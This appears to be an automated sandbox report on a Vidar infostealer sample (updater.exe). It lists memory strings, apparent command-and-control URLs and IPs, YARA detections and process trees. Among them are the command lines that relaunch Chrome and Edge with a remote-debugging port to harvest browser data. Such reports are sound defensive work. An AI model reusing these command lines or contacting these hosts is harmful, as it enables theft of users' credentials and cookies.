Source: chrome.exe, 00000005.00000003.2580789480.000012B000294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000005.00000003.2596343371.000012B001548000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596122109.000012B001578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595932377.000012B0015C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660974650.000012B001580000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596065846.000012B001598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595839601.000012B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Bvq7OK2_7ZA.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596065846.000012B001598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595839601.000012B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd
Source: BitLockerToGo.exe, 00000003.00000002.3095906196.000000000609C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: BitLockerToGo.exe, 00000003.00000002.3095906196.000000000609C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: BitLockerToGo.exe, 00000003.00000002.3095906196.000000000609C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000003.00000002.3095906196.000000000609C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000003.00000002.3095906196.000000000609C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: BitLockerToGo.exe, 00000003.00000002.3095906196.000000000609C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000005.00000002.2655440089.000012B000694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660242790.000012B0010E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000005.00000002.2660242790.000012B0010E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000005.00000002.2658049917.000012B000C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655382001.000012B000674000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlP
Source: chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
Source: chrome.exe, 00000005.00000002.2661693626.000012B001AC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlultP
Source: BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2493291737.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2521967056.0000000002E97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz
Source: BitLockerToGo.exe, 00000003.00000003.2560741591.0000000002EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz)
Source: BitLockerToGo.exe, 00000003.00000003.2507341320.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2493291737.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2521967056.0000000002E97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/
Source: BitLockerToGo.exe, 00000003.00000003.2535744850.0000000002EDC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2507341320.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2493291737.0000000002E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/--
Source: BitLockerToGo.exe, 00000003.00000003.2552646153.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/132
Source: BitLockerToGo.exe, 00000003.00000003.2552646153.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2560741591.0000000002EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/8
Source: BitLockerToGo.exe, 00000003.00000003.2552646153.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/=
Source: BitLockerToGo.exe, 00000003.00000003.2521363293.0000000002EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/H
Source: BitLockerToGo.exe, 00000003.00000003.2478630340.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3090094818.0000000002E8B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2507341320.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2493291737.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2521967056.0000000002E97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/O
Source: BitLockerToGo.exe, 00000003.00000003.2507341320.0000000002E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/U
Source: BitLockerToGo.exe, 00000003.00000003.2875568537.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/ity
Source: BitLockerToGo.exe, 00000003.00000003.2875568537.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/k
Source: BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/r
Source: BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/tem32
Source: BitLockerToGo.exe, 00000003.00000003.2507341320.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2493291737.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2521967056.0000000002E97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz/w
Source: BitLockerToGo.exe, 00000003.00000003.2875568537.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874398480.0000000002E86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz8
Source: BitLockerToGo.exe, 00000003.00000003.2560741591.0000000002EDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xu1.dijiafuzhu.xyz=

Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50138
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.2.159:443 -> 192.168.2.5:49871 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.2454538216.000000000BE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000000.00000002.2454538216.000000000BE00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 00000000.00000002.2454538216.000000000BE40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io

Source: updater.exe, 00000000.00000002.2454538216.000000000BEDC000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs updater.exe

Source: updater.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 00000000.00000002.2454538216.000000000BF16000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.2454538216.000000000BE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.2454538216.000000000BDE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000003.00000002.3089686713.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.2454538216.000000000BE00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000000.00000002.2454538216.000000000BE40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@79/284@28/22

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\1200HPVR.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4072:120:WilError_03

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\e0bd4dd6-bce5-4cf7-8258-dd5f88cd1aec.tmp

Source: updater.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\updater.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000005.00000002.2655566372.000012B0006DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: ri5x4ozua.3.dr, bas0zuaim.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: updater.exe	Virustotal: Detection: 75%
Source: updater.exe	ReversingLabs: Detection: 79%

Source: updater.exe	String found in binary or memory: net/addrselect.go
Source: updater.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go

Source: unknown	Process created: C:\Users\user\Desktop\updater.exe "C:\Users\user\Desktop\updater.exe"
Source: C:\Users\user\Desktop\updater.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2312,i,2291169248669740386,7514103051101934735,262144 /prefetch:8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2720 --field-trial-handle=2488,i,5951683665883633308,6049568498423703109,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2056,i,5947646742752305411,13093796674475547670,262144 /prefetch:3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
